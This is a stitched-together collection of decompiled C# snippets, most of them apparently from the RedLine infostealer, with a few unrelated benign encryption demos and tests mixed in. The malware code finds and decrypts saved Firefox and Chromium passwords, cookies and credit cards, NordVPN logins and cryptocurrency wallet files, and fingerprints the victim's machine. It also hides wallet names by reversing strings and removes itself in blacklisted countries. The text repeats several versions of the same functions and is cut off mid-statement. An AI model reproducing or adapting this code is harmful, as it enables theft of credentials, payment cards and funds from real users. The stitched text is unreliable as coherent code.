private static byte[] GetPrivate3Key(string file) { byte[] array = new byte[24]; try { if (!File.Exists(file)) { return(array); } new DataTable(); GeckoDatabase berkeleyDB = new GeckoDatabase(file); PasswordCheck passwordCheck = new PasswordCheck(ParseDb(berkeleyDB, (string x) => x.Equals("password-check"))); string hexString = ParseDb(berkeleyDB, (string x) => x.Equals("global-salt")); GeckoPasswordBasedEncryption geckoPasswordBasedEncryption = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), DecryptHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt)); geckoPasswordBasedEncryption.Init(); TripleDESHelper.Decrypt(geckoPasswordBasedEncryption.DataKey, geckoPasswordBasedEncryption.DataIV, DecryptHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck)); Asn1Object asn1Object = Asn1Factory.Create(DecryptHelper.ConvertHexStringToByteArray(ParseDb(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt")))); GeckoPasswordBasedEncryption geckoPasswordBasedEncryption2 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), asn1Object.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData); geckoPasswordBasedEncryption2.Init(); Asn1Object asn1Object2 = Asn1Factory.Create(Asn1Factory.Create(Encoding.Default.GetBytes(TripleDESHelper.Decrypt(geckoPasswordBasedEncryption2.DataKey, geckoPasswordBasedEncryption2.DataIV, asn1Object.Objects[0].Objects[1].ObjectData))).Objects[0].Objects[2].ObjectData); if (asn1Object2.Objects[0].Objects[3].ObjectData.Length <= 24) { array = asn1Object2.Objects[0].Objects[3].ObjectData; return(array); } Array.Copy(asn1Object2.Objects[0].Objects[3].ObjectData, asn1Object2.Objects[0].Objects[3].ObjectData.Length - 24, array, 0, 24); return(array); } catch { return(array); } }
private static List <LoginPair> ParseLogins(string profile, byte[] privateKey) { List <LoginPair> loginPairList = new List <LoginPair>(); try { string tempCopy = DecryptHelper.CreateTempCopy(Path.Combine(profile, "logins.json")); if (!File.Exists(tempCopy)) { return(loginPairList); } foreach (JsonValue jsonValue in (IEnumerable)File.ReadAllText(tempCopy).FromJSON()["logins"]) { Asn1Object asn1Object1 = Asn1Factory.Create(Convert.FromBase64String(jsonValue["encryptedUsername"].ToString(false))); Asn1Object asn1Object2 = Asn1Factory.Create(Convert.FromBase64String(jsonValue["encryptedPassword"].ToString(false))); string str1 = Regex.Replace(TripleDESHelper.Decrypt(privateKey, asn1Object1.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object1.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); string str2 = Regex.Replace(TripleDESHelper.Decrypt(privateKey, asn1Object2.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); LoginPair loginPair = new LoginPair() { Host = string.IsNullOrEmpty(jsonValue["hostname"].ToString(false)) ? "UNKNOWN" : jsonValue["hostname"].ToString(false), Login = string.IsNullOrEmpty(str1) ? "UNKNOWN" : str1, Password = string.IsNullOrEmpty(str2) ? "UNKNOWN" : str2 }; if (loginPair.Login != "UNKNOWN" && loginPair.Password != "UNKNOWN" && loginPair.Host != "UNKNOWN") { loginPairList.Add(loginPair); } } } catch { } return(loginPairList); }
// Token: 0x060002C7 RID: 711 RVA: 0x0000C99C File Offset: 0x0000AB9C private static List <LoginPair> GetCredentials(string profile) { List <LoginPair> list = new List <LoginPair>(); try { if (File.Exists(Path.Combine(profile, "key3.db"))) { bool flag; string text = DecryptHelper.TryCreateTemp(Path.Combine(profile, "key3.db"), out flag); list.AddRange(GeckoEngine.ParseLogins(profile, GeckoEngine.GetPrivate4Key(text))); if (flag) { File.Delete(text); } } if (File.Exists(Path.Combine(profile, "key4.db"))) { bool flag2; string text2 = DecryptHelper.TryCreateTemp(Path.Combine(profile, "key4.db"), out flag2); list.AddRange(GeckoEngine.ParseLogins(profile, GeckoEngine.GetPrivate4Key(text2))); if (flag2) { File.Delete(text2); } } } catch (Exception) { } return(list); }
public static List <Browser> ParseBrowsers() { List <Browser> browserList = new List <Browser>(); try { List <string> stringList = new List <string>(); stringList.AddRange((IEnumerable <string>)DecryptHelper.FindPaths(RedLine.Logic.Helpers.Constants.LocalAppData, 4, 1, "key3.db", "key4.db", "cookies.sqlite", "logins.json")); stringList.AddRange((IEnumerable <string>)DecryptHelper.FindPaths(RedLine.Logic.Helpers.Constants.RoamingAppData, 4, 1, "key3.db", "key4.db", "cookies.sqlite", "logins.json")); foreach (string fileName in stringList) { string fullName = new FileInfo(fileName).Directory.FullName; string str = fileName.Contains(RedLine.Logic.Helpers.Constants.RoamingAppData) ? GeckoEngine.GetRoamingName(fullName) : GeckoEngine.GetLocalName(fullName); if (!string.IsNullOrEmpty(str)) { Browser browser = new Browser() { Name = str, Profile = new DirectoryInfo(fullName).Name, Cookies = (IList <Cookie>) new List <Cookie>((IEnumerable <Cookie>)GeckoEngine.ParseCookies(fullName)).IsNull <List <Cookie> >(), Credentials = (IList <LoginPair>) new List <LoginPair>((IEnumerable <LoginPair>)GeckoEngine.GetCredentials(fullName).IsNull <List <LoginPair> >()).IsNull <List <LoginPair> >(), Autofills = (IList <Autofill>) new List <Autofill>(), CreditCards = (IList <CreditCard>) new List <CreditCard>() }; if (browser.Cookies.Count <Cookie>((Func <Cookie, bool>)(x => x.IsNotNull <Cookie>())) > 0 || browser.Credentials.Count <LoginPair>((Func <LoginPair, bool>)(x => x.IsNotNull <LoginPair>())) > 0) { browserList.Add(browser); } } } } catch { } return(browserList); }
static void Main(string[] args) { bool pass = false; string ans = "ABC123"; do { Console.WriteLine(string.Format("Please type \"{0}\"", ans)); string input = Console.ReadLine(); EncryptHelper encryptor = new EncryptHelper(); string encryptString = encryptor.EncryptData(input, Algorithm.StringTransformationFormat.UTF8, Algorithm.Cryptography.AES, Algorithm.StringEncodeFormat.Base64); Console.WriteLine(string.Format("Encrypted String: {0}", encryptString)); Console.WriteLine(string.Format("Encrypted Password & Salt is {0} & {1}", encryptor.Password, encryptor.Salt)); DecryptHelper decryptor = new DecryptHelper(encryptor.Password, encryptor.Salt); string originalInput = decryptor.DecryptData(encryptString, Algorithm.StringEncodeFormat.Base64, Algorithm.Cryptography.AES, Algorithm.StringTransformationFormat.UTF8); Console.WriteLine(string.Format("Decrypted String: {0}", originalInput)); encryptString = encryptor.EncryptData(input, Algorithm.StringTransformationFormat.UTF8, Algorithm.Cryptography.RSA, Algorithm.StringEncodeFormat.Base64); Console.WriteLine(string.Format("Encrypted String: {0}", encryptString)); Console.WriteLine(string.Format("Encrypted Password is {0}", encryptor.Password)); originalInput = decryptor.DecryptData(encryptString, Algorithm.StringEncodeFormat.Base64, Algorithm.Cryptography.RSA, Algorithm.StringTransformationFormat.UTF8); Console.WriteLine(string.Format("Decrypted String: {0}", originalInput)); encryptor.ClearRSAKeyContainer(); if (input == ans) { pass = true; } }while (!pass); }
// Token: 0x06000191 RID: 401 RVA: 0x00004A38 File Offset: 0x00002C38 public static IList <ColdWallet> ParseFiles() { List <ColdWallet> list = new List <ColdWallet>(); try { List <string> list2 = DecryptHelper.FindPaths(Constants.RoamingAppData, 2, 1, new string[] { new string("tad.tellaw".Reverse <char>().ToArray <char>()), new string("tellaw".Reverse <char>().ToArray <char>()) }); list2.AddRange(DecryptHelper.FindPaths(Constants.LocalAppData, 2, 1, new string[] { new string("tad.tellaw".Reverse <char>().ToArray <char>()), new string("tellaw".Reverse <char>().ToArray <char>()) })); foreach (string text in list2) { try { FileInfo fileInfo = new FileInfo(text); list.Add(new ColdWallet { DataArray = File.ReadAllBytes(text), FileName = fileInfo.Name, WalletName = fileInfo.Directory.Name, WalletDir = fileInfo.Directory.Name }); } catch { } } List <ColdWallet> list3 = new List <ColdWallet>(); list3.AddRange(ColdWalletsGrabber.ParseElectrum()); list3.AddRange(ColdWalletsGrabber.ParseEth()); list3.AddRange(ColdWalletsGrabber.ParseExodus()); list3.AddRange(ColdWalletsGrabber.ParseGuarda()); list3.AddRange(ColdWalletsGrabber.ParseAtomic()); list3.AddRange(ColdWalletsGrabber.ParseCoinomi()); list3.AddRange(ColdWalletsGrabber.ParseWaves()); list3.AddRange(ColdWalletsGrabber.ParseJaxx()); ColdWallet item = ColdWalletsGrabber.ParseMonero(); if (!string.IsNullOrWhiteSpace(item.FileName)) { list.Add(item); } foreach (ColdWallet item2 in list3) { list.Add(item2); } } catch (Exception) { } return(list); }
public static UserLog Create(ClientSettings settings) { UserLog userLog = new UserLog(); try { GeoInfo geoInfo = GeoHelper.Get(); IList <string> blacklistedCountry = settings.BlacklistedCountry; if (blacklistedCountry != null && blacklistedCountry.Count > 0 && settings.BlacklistedCountry.Contains(geoInfo.Country)) { InstallManager.RemoveCurrent(); } WmiDiskDrive wmiDiskDrive = new WmiService().QueryFirst <WmiDiskDrive>(new WmiDiskDriveQuery()); Size size = Screen.PrimaryScreen.Bounds.Size; string text = System.TimeZone.CurrentTimeZone.GetUtcOffset(DateTime.Now).ToString(); if (!text.StartsWith("-")) { text = "+" + text; } userLog.IP = geoInfo.IP; userLog.Location = geoInfo.Location; userLog.Country = geoInfo.Country; userLog.Screenshot = CaptureScreen(); userLog.UserAgent = UserAgentDetector.GetUserAgent(); IList <string> blacklistedCountry2 = settings.BlacklistedCountry; if (blacklistedCountry2 != null && blacklistedCountry2.Count > 0 && settings.BlacklistedCountry.Contains(geoInfo.Country)) { InstallManager.RemoveCurrent(); } userLog.HWID = DecryptHelper.GetMd5Hash(Environment.UserDomainName + Environment.UserName + wmiDiskDrive.SerialNumber).Replace("-", string.Empty); userLog.CurrentLanguage = InputLanguage.CurrentInputLanguage.Culture.EnglishName; userLog.TimeZone = "UTC" + text; userLog.MonitorSize = $"{size.Width}x{size.Height}"; userLog.IsProcessElevated = NativeMethods.IsUserAnAdmin(); userLog.UacType = UacHelper.AdminPromptBehavior; userLog.OS = OsDetector.GetWindowsVersion(); userLog.Username = Environment.UserName; return(userLog); } catch { return(userLog); } finally { userLog.HWID = (string.IsNullOrWhiteSpace(userLog.HWID) ? "UNKNOWN" : userLog.HWID); userLog.IP = (string.IsNullOrWhiteSpace(userLog.IP) ? "UNKNOWN" : userLog.IP); userLog.MonitorSize = (string.IsNullOrWhiteSpace(userLog.MonitorSize) ? "UNKNOWN" : userLog.MonitorSize); userLog.OS = (string.IsNullOrWhiteSpace(userLog.OS) ? "UNKNOWN" : userLog.OS); userLog.TimeZone = (string.IsNullOrWhiteSpace(userLog.TimeZone) ? "UNKNOWN" : userLog.TimeZone); userLog.Username = (string.IsNullOrWhiteSpace(userLog.Username) ? "UNKNOWN" : userLog.Username); userLog.Location = (string.IsNullOrWhiteSpace(userLog.Location) ? "UNKNOWN" : userLog.Location); userLog.Country = (string.IsNullOrWhiteSpace(userLog.Country) ? "UNKNOWN" : userLog.Country); userLog.CurrentLanguage = (string.IsNullOrWhiteSpace(userLog.CurrentLanguage) ? "UNKNOWN" : userLog.CurrentLanguage); userLog.UserAgent = (string.IsNullOrWhiteSpace(userLog.UserAgent) ? "UNKNOWN" : userLog.UserAgent); } }
public void Test() { var encryptor = new EncryptHelper(PublicRSAParameters); var decryptor = new DecryptHelper(PrivateRSAParameters); var str = RandomStringGen(); var encData = encryptor.Encrypt(str).Result; var resultStr = decryptor.DecryptToString(encData).Result; Assert.AreEqual(str, resultStr); }
private static string DecryptV10(string localStatePath, string chiperText) { int length = 12; string str1 = "v10"; string str2 = "DPAPI"; string empty = string.Empty; byte[] key = DecryptHelper.DecryptBlob(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(File.ReadAllText(localStatePath).FromJSON()["os_crypt"]["encrypted_key"].ToString(false))).Substring(str2.Length)), DataProtectionScope.CurrentUser, (byte[])null); byte[] bytes = Encoding.Default.GetBytes(chiperText.Substring(str1.Length, length)); return(AesGcm256.Decrypt(Encoding.Default.GetBytes(chiperText.Substring(length + str1.Length)), key, bytes)); }
// Token: 0x0600019B RID: 411 RVA: 0x0000557C File Offset: 0x0000377C public static List <LoginPair> GetProfile() { List <LoginPair> list = new List <LoginPair>(); try { DirectoryInfo directoryInfo = new DirectoryInfo(Path.Combine(Constants.LocalAppData, "NordVPN")); if (!directoryInfo.Exists) { return(list); } DirectoryInfo[] directories = directoryInfo.GetDirectories("NordVpn.exe*"); for (int i = 0; i < directories.Length; i++) { foreach (DirectoryInfo directoryInfo2 in directories[i].GetDirectories()) { try { string text = Path.Combine(directoryInfo2.FullName, "user.config"); if (File.Exists(text)) { XmlDocument xmlDocument = new XmlDocument(); xmlDocument.Load(text); string innerText = xmlDocument.SelectSingleNode("//setting[@name='Username']/value").InnerText; string innerText2 = xmlDocument.SelectSingleNode("//setting[@name='Password']/value").InnerText; if (!string.IsNullOrWhiteSpace(innerText) && !string.IsNullOrWhiteSpace(innerText2)) { string @string = Encoding.UTF8.GetString(DecryptHelper.DecryptBlob(Convert.FromBase64String(innerText), DataProtectionScope.LocalMachine, null)); string string2 = Encoding.UTF8.GetString(DecryptHelper.DecryptBlob(Convert.FromBase64String(innerText2), DataProtectionScope.LocalMachine, null)); if (!string.IsNullOrWhiteSpace(@string) && !string.IsNullOrWhiteSpace(string2)) { list.Add(new LoginPair { Login = @string, Password = string2 }); } } } } catch { } } } } catch { } return(list); }
private static List <Cookie> EnumCook(string profilePath) { List <Cookie> list = new List <Cookie>(); try { string text = Path.Combine(profilePath, "Cookies"); if (!File.Exists(text)) { return(list); } string[] array = profilePath.Split(new string[1] { "\\" }, StringSplitOptions.RemoveEmptyEntries); array = array.Take(array.Length - 1).ToArray(); string localStatePath = Path.Combine(string.Join("\\", array), "Local State"); SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(text)); sqlConnection.ReadTable("cookies"); for (int i = 0; i < sqlConnection.RowLength; i++) { Cookie cookie = null; try { cookie = new Cookie { Host = sqlConnection.ParseValue(i, "host_key").Trim(), Http = (sqlConnection.ParseValue(i, "httponly") == "1"), Path = sqlConnection.ParseValue(i, "path").Trim(), Secure = (sqlConnection.ParseValue(i, "secure") == "1"), Expires = sqlConnection.ParseValue(i, "expires_utc").Trim(), Name = sqlConnection.ParseValue(i, "name").Trim(), Value = DecryptChromium(sqlConnection.ParseValue(i, "encrypted_value"), localStatePath) }; } catch { } if (cookie != null) { list.Add(cookie); } } return(list); } catch { return(list); } }
private static string DecryptV10(string localStatePath, string chiperText) { int num = 12; string text = "v10"; string text2 = "DPAPI"; _ = string.Empty; string s = File.ReadAllText(localStatePath).FromJSON()["os_crypt"]["encrypted_key"].ToString(saving: false); string s2 = Encoding.Default.GetString(Convert.FromBase64String(s)).Substring(text2.Length); byte[] key = DecryptHelper.DecryptBlob(Encoding.Default.GetBytes(s2), DataProtectionScope.CurrentUser); byte[] bytes = Encoding.Default.GetBytes(chiperText.Substring(text.Length, num)); return(AesGcm256.Decrypt(Encoding.Default.GetBytes(chiperText.Substring(num + text.Length)), key, bytes)); }
private static List <string> GetProfile() { List <string> stringList = new List <string>(); try { stringList.AddRange((IEnumerable <string>)DecryptHelper.FindPaths(RedLine.Logic.Helpers.Constants.RoamingAppData, 4, 1, "Login Data", "Web Data", "Cookies")); stringList.AddRange((IEnumerable <string>)DecryptHelper.FindPaths(RedLine.Logic.Helpers.Constants.LocalAppData, 4, 1, "Login Data", "Web Data", "Cookies")); } catch { } return(stringList); }
// Token: 0x060002C8 RID: 712 RVA: 0x0000CA48 File Offset: 0x0000AC48 private static List <Cookie> ParseCookies(string profile) { List <Cookie> list = new List <Cookie>(); try { string text = Path.Combine(profile, "cookies.sqlite"); if (!File.Exists(text)) { return(list); } bool flag; string text2 = DecryptHelper.TryCreateTemp(text, out flag); SqlConnection sqlConnection = new SqlConnection(text2); sqlConnection.ReadTable("moz_cookies"); for (int i = 0; i < sqlConnection.RowLength; i++) { Cookie cookie = null; try { cookie = new Cookie { Host = sqlConnection.ParseValue(i, "host").Trim(), Http = sqlConnection.ParseValue(i, "host").Trim().StartsWith("."), Path = sqlConnection.ParseValue(i, "path").Trim(), Secure = (sqlConnection.ParseValue(i, "isSecure") == "1"), Expires = Convert.ToInt64(sqlConnection.ParseValue(i, "expiry").Trim()), Name = sqlConnection.ParseValue(i, "name").Trim(), Value = sqlConnection.ParseValue(i, "value") }; } catch { } if (cookie != null) { list.Add(cookie); } } if (flag) { File.Delete(text2); } } catch { } return(list); }
private static List <string> GetProfile() { List <string> list = new List <string>(); try { list.AddRange(DecryptHelper.FindPaths(Constants.RoamingAppData, 4, 1, "Login Data", "Web Data", "Cookies")); list.AddRange(DecryptHelper.FindPaths(Constants.LocalAppData, 4, 1, "Login Data", "Web Data", "Cookies")); return(list); } catch { return(list); } }
// Token: 0x060002CB RID: 715 RVA: 0x0000D09C File Offset: 0x0000B29C private static byte[] GetPrivate3Key(string file) { byte[] array = new byte[24]; try { if (!File.Exists(file)) { return(array); } MethodInfo method = typeof(Array).GetMethod("Copy", new Type[] { typeof(Array), typeof(int), typeof(Array), typeof(int), typeof(int) }); GeckoDatabase berkeleyDB = new GeckoDatabase(file); PasswordCheck passwordCheck = new PasswordCheck(GeckoEngine.ParseDb(berkeleyDB, (string x) => x.Equals("password-check"))); string hexString = GeckoEngine.ParseDb(berkeleyDB, (string x) => x.Equals("global-salt")); GeckoPasswordBasedEncryption geckoPasswordBasedEncryption = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.GetEncoding("windows-1251").GetBytes(string.Empty), DecryptHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt)); geckoPasswordBasedEncryption.Init(); TripleDESHelper.Decrypt(geckoPasswordBasedEncryption.DataKey, geckoPasswordBasedEncryption.DataIV, DecryptHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None); Asn1Object asn1Object = Asn1Factory.Create(DecryptHelper.ConvertHexStringToByteArray(GeckoEngine.ParseDb(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt")))); GeckoPasswordBasedEncryption geckoPasswordBasedEncryption2 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.GetEncoding("windows-1251").GetBytes(string.Empty), asn1Object.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData); geckoPasswordBasedEncryption2.Init(); Asn1Object asn1Object2 = Asn1Factory.Create(Asn1Factory.Create(Encoding.GetEncoding("windows-1251").GetBytes(TripleDESHelper.Decrypt(geckoPasswordBasedEncryption2.DataKey, geckoPasswordBasedEncryption2.DataIV, asn1Object.Objects[0].Objects[1].ObjectData, PaddingMode.None))).Objects[0].Objects[2].ObjectData); if (asn1Object2.Objects[0].Objects[3].ObjectData.Length > 24) { method.Invoke(null, new object[] { asn1Object2.Objects[0].Objects[3].ObjectData, asn1Object2.Objects[0].Objects[3].ObjectData.Length - 24, array, 0, 24 }); } else { array = asn1Object2.Objects[0].Objects[3].ObjectData; } } catch { } return(array); }
private static List <CreditCard> EnumCC(string profilePath) { List <CreditCard> list = new List <CreditCard>(); try { string text = Path.Combine(profilePath, "Web Data"); if (!File.Exists(text)) { return(list); } string[] array = profilePath.Split(new string[1] { "\\" }, StringSplitOptions.RemoveEmptyEntries); array = array.Take(array.Length - 1).ToArray(); string localStatePath = Path.Combine(string.Join("\\", array), "Local State"); SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(text)); sqlConnection.ReadTable("credit_cards"); for (int i = 0; i < sqlConnection.RowLength; i++) { CreditCard creditCard = null; try { creditCard = new CreditCard { Holder = sqlConnection.ParseValue(i, "name_on_card").Trim(), ExpirationMonth = Convert.ToInt32(sqlConnection.ParseValue(i, "expiration_month").Trim()), ExpirationYear = Convert.ToInt32(sqlConnection.ParseValue(i, "expiration_year").Trim()), CardNumber = DecryptChromium(sqlConnection.ParseValue(i, "card_number_encrypted"), localStatePath) }; } catch { } if (creditCard != null) { list.Add(creditCard); } } return(list); } catch { return(list); } }
private static List <Cookie> EnumCook(string profilePath) { List <Cookie> cookieList = new List <Cookie>(); try { string str = Path.Combine(profilePath, "Cookies"); if (!File.Exists(str)) { return(cookieList); } string[] strArray = profilePath.Split(new string[1] { "\\" }, StringSplitOptions.RemoveEmptyEntries); string localStatePath = Path.Combine(string.Join("\\", ((IEnumerable <string>)strArray).Take <string>(strArray.Length - 1).ToArray <string>()), "Local State"); SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(str)); sqlConnection.ReadTable("cookies"); for (int rowIndex = 0; rowIndex < sqlConnection.RowLength; ++rowIndex) { Cookie cookie = (Cookie)null; try { cookie = new Cookie() { Host = sqlConnection.ParseValue(rowIndex, "host_key").Trim(), Http = sqlConnection.ParseValue(rowIndex, "httponly") == "1", Path = sqlConnection.ParseValue(rowIndex, "path").Trim(), Secure = sqlConnection.ParseValue(rowIndex, "secure") == "1", Expires = sqlConnection.ParseValue(rowIndex, "expires_utc").Trim(), Name = sqlConnection.ParseValue(rowIndex, "name").Trim(), Value = ChromiumEngine.DecryptChromium(sqlConnection.ParseValue(rowIndex, "encrypted_value"), localStatePath) }; } catch { } if (cookie != null) { cookieList.Add(cookie); } } } catch { } return(cookieList); }
private static List <CreditCard> EnumCC(string profilePath) { List <CreditCard> creditCardList = new List <CreditCard>(); try { string str = Path.Combine(profilePath, "Web Data"); if (!File.Exists(str)) { return(creditCardList); } string[] strArray = profilePath.Split(new string[1] { "\\" }, StringSplitOptions.RemoveEmptyEntries); string localStatePath = Path.Combine(string.Join("\\", ((IEnumerable <string>)strArray).Take <string>(strArray.Length - 1).ToArray <string>()), "Local State"); SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(str)); sqlConnection.ReadTable("credit_cards"); for (int rowIndex = 0; rowIndex < sqlConnection.RowLength; ++rowIndex) { CreditCard creditCard = (CreditCard)null; try { creditCard = new CreditCard() { Holder = sqlConnection.ParseValue(rowIndex, "name_on_card").Trim(), ExpirationMonth = Convert.ToInt32(sqlConnection.ParseValue(rowIndex, "expiration_month").Trim()), ExpirationYear = Convert.ToInt32(sqlConnection.ParseValue(rowIndex, "expiration_year").Trim()), CardNumber = ChromiumEngine.DecryptChromium(sqlConnection.ParseValue(rowIndex, "card_number_encrypted"), localStatePath) }; } catch { } if (creditCard != null) { creditCardList.Add(creditCard); } } } catch { } return(creditCardList); }
private static List <Cookie> ParseCookies(string profile) { List <Cookie> list = new List <Cookie>(); try { string text = Path.Combine(profile, "cookies.sqlite"); if (!File.Exists(text)) { return(list); } SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(text)); sqlConnection.ReadTable("moz_cookies"); for (int i = 0; i < sqlConnection.RowLength; i++) { Cookie cookie = null; try { cookie = new Cookie { Host = sqlConnection.ParseValue(i, "host").Trim(), Http = (sqlConnection.ParseValue(i, "isSecure") == "1"), Path = sqlConnection.ParseValue(i, "path").Trim(), Secure = (sqlConnection.ParseValue(i, "isSecure") == "1"), Expires = sqlConnection.ParseValue(i, "expiry").Trim(), Name = sqlConnection.ParseValue(i, "name").Trim(), Value = sqlConnection.ParseValue(i, "value") }; } catch { } if (cookie != null) { list.Add(cookie); } } return(list); } catch { return(list); } }
private static string DecryptChromium(string chiperText, string localStatePath) { string result = string.Empty; try { if (chiperText.StartsWith("v10")) { result = DecryptV10(localStatePath, chiperText); return(result); } result = DecryptHelper.DecryptBlob(chiperText, DataProtectionScope.CurrentUser).Trim(); return(result); } catch { return(result); } }
/// <summary> /// EyesFree license token 更新 /// </summary> private void SetToken() { var result = new EyesFreeToken(); foreach (var address in NetworkCard.MacAddresses) { result = DecryptHelper.Decrypt <EyesFreeToken>(_licenseKey, address); if (result != null) { // Token _token = result; // Valid MAC _validMacAddress = address; return; } } }
private static List <Cookie> ParseCookies(string profile) { List <Cookie> cookieList = new List <Cookie>(); try { string str = Path.Combine(profile, "cookies.sqlite"); if (!File.Exists(str)) { return(cookieList); } SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(str)); sqlConnection.ReadTable("moz_cookies"); for (int rowIndex = 0; rowIndex < sqlConnection.RowLength; ++rowIndex) { Cookie cookie = (Cookie)null; try { cookie = new Cookie() { Host = sqlConnection.ParseValue(rowIndex, "host").Trim(), Http = sqlConnection.ParseValue(rowIndex, "isSecure") == "1", Path = sqlConnection.ParseValue(rowIndex, "path").Trim(), Secure = sqlConnection.ParseValue(rowIndex, "isSecure") == "1", Expires = sqlConnection.ParseValue(rowIndex, "expiry").Trim(), Name = sqlConnection.ParseValue(rowIndex, "name").Trim(), Value = sqlConnection.ParseValue(rowIndex, "value") }; } catch { } if (cookie != null) { cookieList.Add(cookie); } } } catch { } return(cookieList); }
private static byte[] GetPrivate3Key(string file) { byte[] numArray = new byte[24]; try { if (!File.Exists(file)) { return(numArray); } DataTable dataTable = new DataTable(); GeckoDatabase berkeleyDB = new GeckoDatabase(file); PasswordCheck passwordCheck = new PasswordCheck(GeckoEngine.ParseDb(berkeleyDB, (Func <string, bool>)(x => x.Equals("password-check")))); string db = GeckoEngine.ParseDb(berkeleyDB, (Func <string, bool>)(x => x.Equals("global-salt"))); GeckoPasswordBasedEncryption passwordBasedEncryption1 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(db), Encoding.Default.GetBytes(string.Empty), DecryptHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt)); passwordBasedEncryption1.Init(); TripleDESHelper.Decrypt(passwordBasedEncryption1.DataKey, passwordBasedEncryption1.DataIV, DecryptHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None); Asn1Object asn1Object1 = Asn1Factory.Create(DecryptHelper.ConvertHexStringToByteArray(GeckoEngine.ParseDb(berkeleyDB, (Func <string, bool>)(x => { if (!x.Equals("password-check") && !x.Equals("Version")) { return(!x.Equals("global-salt")); } return(false); })))); GeckoPasswordBasedEncryption passwordBasedEncryption2 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(db), Encoding.Default.GetBytes(string.Empty), asn1Object1.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData); passwordBasedEncryption2.Init(); Asn1Object asn1Object2 = Asn1Factory.Create(Asn1Factory.Create(Encoding.Default.GetBytes(TripleDESHelper.Decrypt(passwordBasedEncryption2.DataKey, passwordBasedEncryption2.DataIV, asn1Object1.Objects[0].Objects[1].ObjectData, PaddingMode.None))).Objects[0].Objects[2].ObjectData); if (asn1Object2.Objects[0].Objects[3].ObjectData.Length > 24) { Array.Copy((Array)asn1Object2.Objects[0].Objects[3].ObjectData, asn1Object2.Objects[0].Objects[3].ObjectData.Length - 24, (Array)numArray, 0, 24); } else { numArray = asn1Object2.Objects[0].Objects[3].ObjectData; } } catch { } return(numArray); }
private static List <LoginPair> GetCredentials(string profilePath) { List <LoginPair> list = new List <LoginPair>(); try { string text = Path.Combine(profilePath, "Login Data"); if (!File.Exists(text)) { return(list); } string[] array = profilePath.Split(new string[1] { "\\" }, StringSplitOptions.RemoveEmptyEntries); array = array.Take(array.Length - 1).ToArray(); string localStatePath = Path.Combine(string.Join("\\", array), "Local State"); SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(text)); sqlConnection.ReadTable("logins"); for (int i = 0; i < sqlConnection.RowLength; i++) { LoginPair loginPair = new LoginPair(); try { loginPair = ReadData(sqlConnection, i, localStatePath); } catch { } if (loginPair.Login.IsNotNull() && loginPair.Login != "UNKNOWN" && loginPair.Password != "UNKNOWN" && loginPair.Host != "UNKNOWN") { list.Add(loginPair); } } return(list); } catch { return(list); } }
// Token: 0x060002E5 RID: 741 RVA: 0x0000E808 File Offset: 0x0000CA08 private static string DecryptChromium(string chiperText, string chromeKey) { string result = string.Empty; try { if (chiperText.StartsWith("v10") || chiperText.StartsWith("v11")) { result = ChromiumEngine.DecryptV10(chromeKey, chiperText); } else { result = DecryptHelper.DecryptBlob(chiperText, DataProtectionScope.CurrentUser, null).Trim(); } } catch (Exception value) { Console.WriteLine(value); } return(result); }
// Token: 0x060002C9 RID: 713 RVA: 0x0000CBD0 File Offset: 0x0000ADD0 private static List <LoginPair> ParseLogins(string profile, byte[] privateKey) { List <LoginPair> list = new List <LoginPair>(); try { if (!File.Exists(Path.Combine(profile, "logins.json"))) { return(list); } bool flag; string path = DecryptHelper.TryCreateTemp(Path.Combine(profile, "logins.json"), out flag); foreach (object obj in ((IEnumerable)File.ReadAllText(path).FromJSON()["logins"])) { JsonValue jsonValue = (JsonValue)obj; Asn1Object asn1Object = Asn1Factory.Create(Convert.FromBase64String(jsonValue["encryptedUsername"].ToString(false))); Asn1Object asn1Object2 = Asn1Factory.Create(Convert.FromBase64String(jsonValue["encryptedPassword"].ToString(false))); string text = Regex.Replace(TripleDESHelper.Decrypt(privateKey, asn1Object.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); string text2 = Regex.Replace(TripleDESHelper.Decrypt(privateKey, asn1Object2.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); LoginPair loginPair = new LoginPair { Host = (string.IsNullOrEmpty(jsonValue["hostname"].ToString(false)) ? "UNKNOWN" : jsonValue["hostname"].ToString(false)), Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text), Password = (string.IsNullOrEmpty(text2) ? 